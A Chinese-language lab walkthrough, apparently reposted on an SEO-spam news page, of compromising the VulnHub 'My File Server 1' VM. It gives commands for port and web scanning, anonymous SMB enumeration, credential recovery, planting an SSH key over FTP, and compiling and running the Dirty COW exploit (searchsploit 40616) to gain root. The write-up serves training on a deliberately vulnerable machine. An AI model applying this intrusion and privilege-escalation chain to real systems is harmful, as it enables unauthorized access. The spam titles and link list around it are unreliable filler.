当前位置: 首页 > news >正文

做软件销售网站免费网站加速器

做软件销售网站,免费网站加速器,微信小程序制作视频教程,慈溪建设集团网站下载地址 https://download.vulnhub.com/myfileserver/My_file_server_1.ova 首先我们需要发现ip 我的kali是59.162所以167就是靶机的 然后我们拿nmap扫一下端口 nmap -sV -p- 192.168.59.167 扫完发现有七个端口开放 按照习惯先看80 没看到有啥有用信息,用nikto扫一下 nik…

下载地址

 https://download.vulnhub.com/myfileserver/My_file_server_1.ova

首先我们需要发现ip

我的kali是59.162所以167就是靶机的

然后我们拿nmap扫一下端口

nmap -sV -p- 192.168.59.167

扫完发现有七个端口开放 按照习惯先看80

没看到有啥有用信息,用nikto扫一下

nikto -h 192.168.59.167

发现了一个readme.txt

访问后发现了一个密码

但是不知道密码是哪个服务的 尝试一下ftp匿名登陆

连接上了也没有什么可以利用的信息

ssh连接显示没有权限(就不展示了)

尝试使用smbmap进行枚举 发现smbdate有读写权限

使用smbclient //192.168.59.167/smbdata     连接共享目录,只有smbdata可以匿名访问

下载secure和sshd_config

下载完退出smb(exit),然后cat查看这两个文件发现发现用户smbuser,密码chauthtok

现在已经有了用户名smbuser,而且一开始网页给了密码rootroot1。那么再尝试一下用ftp登录(不知道为啥密码不能用chauthtok)登录成功

进行ssh免密操作,然后上传到靶机 在进行ssh登入 登入成功

ssh-keygen -t rsa #生成公钥私钥文件

改成之前sshd_config文件里要求的名称。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。

ssh -i test smbuser@192.168.59.167

下一步就是提权

这里发现内核版本较低,可以尝试使用脏牛提权

先搜索漏洞库

searchsploit dirty

下载到本地

searchsploit -m 40616.c

使用FPT上传脏牛文件到服务器 然后gcc编译提权

put /root/40616.c /tmp/dirty.c

重新ssh去到tmp下

gcc -pthread dirty.c -o dirty -lcrypt

执行./dirty 123456

可以看到权限已经获取到

成功获取flag

http://www.yayakq.cn/news/873888/

相关文章:

  • 中国建设银行陕西分行官方网站h5源码分享网
  • 内江市网站建设燕莎网站建设
  • 建设网站需要用到哪些技术人员渠道网关
  • 重庆网站建立如何做网站seo
  • 口碑好的邵阳网站建设去电商公司上班怎么样
  • 做电影网站赚钱的方法网站空间制作
  • 黄石公司做网站国内虚拟助手网站
  • 知名网站制作企业分类目录模板
  • 免费视频课程网站模板我局 负责 建设 网站
  • 随州做网站的公司网站开发 项目计划书
  • 网站开发好了如何上线有那个网站
  • 公司网站设计建议wordpress怎么学
  • a站全称赣州人才网赣州九一人才
  • 哪些网站的简历做的比较好凡科网邮箱登陆
  • 手机app wap网站模板下载广东省室内设计公司排名
  • 湖北省建设厅建筑资料官方网站广西建设网官网桂建云
  • 做网站咨询网站线框图
  • 轻淘客网站怎么做网站建设的主要内容
  • 网站制作泉州公司网站推广有哪些手段
  • 网站免费做软件有哪些西青网站文化建设
  • 自己做网站后台网站小图标素材下载
  • 苏州相城区网站建设互联网产品推广案例范文
  • 专业网站排名优化公司成都人高清影院品牌加盟
  • 单页面网站卖什么好做网站需要ps吗
  • 芜湖服装网站建设网站建设买了服务器后怎么做
  • 贵阳营销网站建设公司咸宁网站建设
  • 企业电子商务网站开发物流网站建设工作岗位
  • 网站建设 自学wordpress文章内容编辑器
  • 安溪县住房和城乡规划建设网站wordpress搜索判断
  • 绑定网站高明网站设计平台